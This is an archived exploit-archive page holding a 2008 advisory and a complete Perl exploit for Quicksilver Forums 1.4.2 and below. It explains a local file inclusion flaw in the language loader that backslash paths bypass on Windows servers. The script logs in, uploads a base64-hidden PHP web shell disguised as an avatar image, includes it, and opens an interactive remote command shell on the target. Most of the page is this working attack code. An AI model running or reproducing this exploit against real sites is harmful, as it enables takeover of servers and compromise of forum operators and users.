what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

quicksilverforums-rce.txt

quicksilverforums-rce.txt
Posted Nov 25, 2008
Authored by __GiReX__ | Site girex.altervista.org

Quicksilver Forums versions 1.4.2 and below suffer from local file inclusion and malicious avatar upload vulnerabilities.

tags | exploit, local, vulnerability, file inclusion
SHA-256 | 52e73b5d85cf2beaa5ce757b5bbf2541d986efa2f3239a35119dc99182adf5ac

quicksilverforums-rce.txt

Change Mirror Download
# Author:  __GiReX__
# Homepage: girex.altervista.org

# Date: 24/11/2008

# CMS: Quicksilver Forums <= 1.4.2
# Site: http://www.quicksilverforums.com/

# Bug: Local File Inclusion
# Exploit: Remote Command Execution

# Note: Works with windows servers only
Works regardless php.ini settings

# Bug Discussion:

# file: global.php
# lines: 318-329

function get_lang($lang, $a = null, $path = './', $main = true)
{
if (isset($this->get['lang'])) {
$lang = $this->get['lang'];

}

if (strstr($lang, '/') || !file_exists($path . 'languages/' . $lang . '.php')) {
$lang = 'en';
}

include $path . 'languages/' . $lang . '.php';

# As you can see, Quicksilver filter can be easily bypassed in windows servers
# couse use of backslashes "\" in filesystem's paths.

# Thanks to the functions uset_magic_quotes_gpc() this vuln works regardless php.ini setting

# We can upload a malicious avatar and include it to have a RCE


#!/usr/bin/perl
# Quicksilver Forums <= 1.4.2 RCE Exploit (win only)
# Local File Inclusion / Malicious Avatar Upload
# Coded by __GiReX__

use IO::Socket::INET;
use MIME::Base64;

if(@ARGV < 3)
{
banner();
print "[+] You need an user account to run this exploit\n\n";
print "[+] Usage: perl $0 <host> <path> <your_username> <your_pass>\n";
print "[+] Example: perl $0 localhost /quick/ test password\n";
exit;
}

my ($host, $path, $user, $pass) = @ARGV;

$host =~ s/^http:\/\///;
$host =~ s/^www\.//;
$target = "http://${host}${path}";

banner();
check_vuln();

$cookie = do_login() or debug($debug, 1);
upload_avatar() or debug($debug, 2);

while(1)
{
print "[+] shell\@quick:\$ ";
chomp(my $cmd = <STDIN>);

exit if $cmd eq 'exit';
create_socket();

print $sd "GET ${target}index.php?lang=..\\avatars\\uploaded\\${user_id}.png%00 HTTP/1.1\r\n".
"Host: $host\r\n".
"Cookie: $cookie\r\n".
"CMD: ". encode_base64($cmd)."\r\n".
"Connection: keep-alive\r\n\r\n";

$out .= $_ while <$sd>;

if($out =~ /-code-/)
{
$_out = substr($out, index($out, '-code-') + 6); $n = index($_out, '-code');
$__out = substr($_out, 0, $n);
}
else
{
debug($out, 3);
}

close($sd);
$out = undef;

print STDOUT "\n". $__out."\n";
}

sub check_vuln
{
create_socket();

print $sd "GET ${target}index.php?lang=..\\languages\\en.php%00 HTTP/1.1\r\n".
"Host: $host\r\n".
"Connection: keep-alive\r\n\r\n";

while(my $res = <$sd>)
{
$ok = 1 if $res =~ /404 Not Found/;

if($res =~ /<b>Fatal error<\/b>/)
{
close($sd);
return 1;
}

our $debug .= $res;
}

print STDOUT "\n[-] Server not vulnerable, maybe it's not a win server!\n" and exit
if not defined $ok;

debug($debug, 0);
}


sub do_login
{
create_socket();
my $data = "user=${user}&pass=${pass}&request_uri=%2F${path}%2Findex.php&submit=Invia";

print $sd "POST ${target}index.php?a=login&s=on HTTP/1.1\r\n" .
"Host: $host\r\n" .
"Connection: keep-alive\r\n" .
"Content-Type: application/x-www-form-urlencoded\r\n" .
"Content-Length: ". length($data)."\r\n\r\n" .
$data . "\r\n\r\n";



while(my $res = <$sd>)
{
if($res =~ /Set-Cookie: (\w+)_user=([0-9]+)/)
{
$prefix = $1 unless $prefix;
$user_id = $2 unless $user_id;
}
elsif($res =~ /Set-Cookie: \w+_pass=([a-z0-9]{32})/)
{
my $hash_pwd = $1; close($sd);
print STDOUT "\n[+] Logged in with $user account\n";

return "${prefix}_user=${user_id}; ${prefix}_pass=${hash_pwd};";
}

our $debug .= $res;
}

close($sd);
return undef;
}

sub upload_avatar
{
create_socket();
# Image content + post's var base64 encoded
my $data = "LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0yMjY0ODI3NDQ2MjM4MDUNCk".
"NvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0idXNlcl9hdmF".
"0YXJfd2lkdGgiDQoNCjUwDQotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t".
"LTIyNjQ4Mjc0NDYyMzgwNQ0KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kY".
"XRhOyBuYW1lPSJ1c2VyX2F2YXRhcl9oZWlnaHQiDQoNCjUwDQotLS0tLS0tLS".
"0tLS0tLS0tLS0tLS0tLS0tLS0tLTIyNjQ4Mjc0NDYyMzgwNQ0KQ29udGVudC1E".
"aXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJ1c2VyX2F2YXRhcl90eXBlI".
"g0KDQp1cGxvYWQNCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tMjI2ND".
"gyNzQ0NjIzODA1DQpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5".
"hbWU9ImF2YXRhcl91cGxvYWQiOyBmaWxlbmFtZT0iYXZhdF9hci5wbmciDQpD".
"b250ZW50LVR5cGU6IGltYWdlL3BuZw0KDQo8P3BocA0KaWYoaXNzZXQoJF9TRV".
"JWRVJbJ0hUVFBfQ01EJ10pKQp7CmVjaG8gIi1jb2RlLSI7IHBhc3N0aHJ1KGJ".
"hc2U2NF9kZWNvZGUoJF9TRVJWRVJbJ0hUVFBfQ01EJ10pKTsgZWNobyAiLWNv".
"ZGUiOwp9DQpkaWUoKTsNCj8+DQotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tL".
"S0tLTIyNjQ4Mjc0NDYyMzgwNQ0KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS".
"1kYXRhOyBuYW1lPSJzdWJtaXQiDQoNClN1Ym1pdA0KLS0tLS0tLS0tLS0tLS0t".
"LS0tLS0tLS0tLS0tLS0yMjY0ODI3NDQ2MjM4MDUtLQ0K";

$data = decode_base64($data);

print $sd "POST ${target}index.php?a=cp&s=avatar HTTP/1.1\r\n".
"Host: $host\r\n" .
"Connection: keep-alive\r\n" .
"Cookie: $cookie\r\n" .
"Content-Type: multipart/form-data; boundary=---------------------------226482744623805\r\n" .
"Content-Length: ". length($data)."\r\n\r\n" .
$data . "\r\n\r\n";


while(my $res = <$sd>)
{
if($res =~ /Your avatar has been updated/)
{
print "[+] Malicious avatar uploaded\n\n"; close($sd);
return 1;
}

our $debug .= $res;
}

close($sd);
return undef;
}

sub create_socket
{
our $sd = new IO::Socket::INET( 'PeerAddr' => $host,
'PeerPort' => '80',
'Proto' => 'tcp',
) or die $@;
}

sub debug
{
my $output = shift;
my $errno = shift;

open(DEBUG, '>', 'debug.txt');
print DEBUG $debug;

if($errno eq '0')
{
print STDOUT "\n[-] Unable to request index.php! See debug.txt for more infos\n";
}
if($errno eq '1')
{
print STDOUT "\n[-] Unable to login! See debug.txt for more infos.\n";
}
elsif($errno eq '2')
{
print STDOUT "\n[-] Unable to upload avatar! See debug.txt for more infos.\n";
}
elsif($errno eq '3')
{
print STDOUT "\n[-] Exploit mistake! See debug.txt for more infos.\n";
}

close(DEBUG);
exit;
}

sub banner
{
print STDOUT "\n[+] Quicksilver Forums <= 1.4.2 RCE Exploit (win only)\n".
"[+] Local File Inclusion / Malicious Avatar Upload\n".
"[+] Coded by __GiReX__\n\n";
}

Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close